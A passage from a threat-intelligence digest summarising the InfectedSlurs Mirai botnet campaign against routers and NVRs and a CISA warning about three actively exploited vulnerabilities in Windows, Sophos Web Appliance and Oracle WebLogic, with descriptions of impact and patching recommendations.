  • Massive, distributed denial-of-service (DDoS) attacks, potential compromise of sensitive data, lateral movement within affected organizations, and persistent threat presence. 

 

Detailed Description: 

  • The campaign exploits two zero-day vulnerabilities in routers and NVRs, logging in with the devices’ default admin credentials and then installing Mirai variants.  
  • The botnet, InfectedSlurs, uses racial and offensive language in its command-and-control servers.  
  • Akamai discovered the campaign in late October 2023; at the time of writing the affected vendors had not yet published patches, with a fix for one of the vulnerabilities expected in December 2023.  
  • The attackers’ identity remains unknown. 

  

Recommendations:  

  1. Apply patches promptly upon release by vendors to mitigate the vulnerabilities. 
  2. Change default admin credentials on routers and NVR devices. 
  3. Implement network segmentation to limit lateral movement. 
Threat 12: CISA Warning - Actively Exploited Vulnerabilities in Windows, Sophos, and Oracle

Sources: 

 

Entities:  

  • U.S. Cybersecurity & Infrastructure Security Agency (CISA) 
  • Microsoft Windows 
  • Sophos Web Appliance 
  • Oracle Fusion Middleware  

 

Indicators of Compromise:  

  • CVE-2023-36584 
  • CVE-2023-1671 
  • CVE-2020-2551 

 

Attack Vectors:  

  • Exploiting applications vulnerable to CVE-2023-36584, CVE-2023-1671 and CVE-2020-2551 

 

Impact:  

  • Remote Code Execution 
  • Compromise of WebLogic Server 
  • Security Feature Bypass 

 

Detailed Description: 

  • CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the need for immediate attention and mitigation. 
  • The three vulnerabilities are: 
    • CVE-2023-36584 – “Mark of the Web” (MotW) security feature bypass on Microsoft Windows. 
    • CVE-2023-1671 – Command injection vulnerability in Sophos Web Appliance allowing remote code execution (RCE). 
    • CVE-2020-2551 – Unspecified vulnerability in Oracle Fusion Middleware, allowing an unauthenticated attacker with network access via IIOP to compromise the WebLogic server. 
  • Microsoft addressed CVE-2023-36584 in the October 2023 Patch Tuesday. 
  • Sophos Web Appliance, affected by CVE-2023-1671, reached end-of-life on July 20, 2023, and users are advised to migrate to Sophos Firewall for ongoing security. 

 

Recommendations: 

  • Apply the relevant security updates to address the identified vulnerabilities.
  • Sophos Web Appliance users must migrate to Sophos Firewall for ongoing security support.